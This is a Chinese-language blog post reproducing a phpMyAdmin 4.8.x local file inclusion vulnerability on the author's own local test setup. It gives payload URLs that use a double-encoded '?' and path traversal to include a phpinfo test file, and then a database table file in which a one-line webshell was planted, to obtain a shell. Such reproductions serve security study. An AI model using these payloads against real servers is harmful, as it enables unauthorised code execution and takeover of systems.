1590天 博客通用头像 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

phpMyAdmin 4.8.x 本地文件包含漏洞getshell复现

发布于 2个月前 / 22 次围观 / 0 条评论 / 技术学习 / Edwiin
本文最后更新于2020-5-13,已超过 1 个月没有更新,如果文章内容或图片资源失效,请【留言反馈】,我会及时处理,谢谢!

漏洞介绍

这个漏洞是由ChaMd5安全团队2018-06-21公开的漏洞,该漏洞利用不要求root权限,只要能够登录 phpMyAdmin 便能够利用。

漏洞环境

VulnSpy 在线 phpMyAdmin 环境地址https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1

下载链接 https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip

复现过程

这里我自己下载搭建

首先在C盘下建立一个名为JunMo.txt内容为phpinfo();

然后登入phpmyadmin来包含这个文件

payload

http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../JunMo.txt

包含成功

然后新建一个数据库在创建一个表然后在字段名处写入一句话木马,在mysql文件夹找到对应的文件

 payload

http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../phpstudy/PHPTutorial\MySQL\data\webshell\webshell.frm

包含成功

全站顶部广告位

  • 支付宝赞助图片
  • 微信赞助图片
  • QQ赞助图片
头像
描述: 还好有你,再见如初。